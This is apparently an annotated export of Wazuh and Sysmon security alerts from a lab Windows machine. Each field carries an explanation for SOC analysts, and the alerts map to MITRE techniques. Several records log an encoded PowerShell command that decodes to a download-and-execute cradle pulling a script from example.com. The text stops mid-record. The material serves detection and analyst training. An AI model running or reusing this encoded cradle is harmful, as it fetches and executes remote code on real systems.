data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:14.588+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:14.588+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  107
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534414.2012276
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:11.9674782Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285801
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:11.949 ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} ProcessId: 16772 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2glcj434.zx1.ps1 CreationUtcTime: 2025-04-24 22:40:11.949 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:11.949
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdca-680a-c70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2glcj434.zx1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:11.949
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:17.537+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:17.537+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  108
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534417.2015045
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:15.1527371Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285824
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:15.104 ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} ProcessId: 16908 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_apqxmac4.3kk.ps1 CreationUtcTime: 2025-04-24 22:40:15.104 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:15.104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdcd-680a-c90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_apqxmac4.3kk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:15.104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:17.537+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:17.537+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  104
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534417.2017814
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:14.9148096Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285823
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:13.227 ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} ProcessId: 16908 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} ParentProcessId: 16772 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:13.227
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdcd-680a-c90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdca-680a-c70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:40:18.055+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:18.055+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534418.2025885
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:16.4499482Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2413
Incremental log record number – handy for timeline order.

data.win.system.processID:  11688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:16Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:16Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:20.450+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:20.450+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  105
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534420.2027467
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:17.7648571Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285865
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:16.281 ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} ProcessId: 17072 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} ParentProcessId: 16908 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand 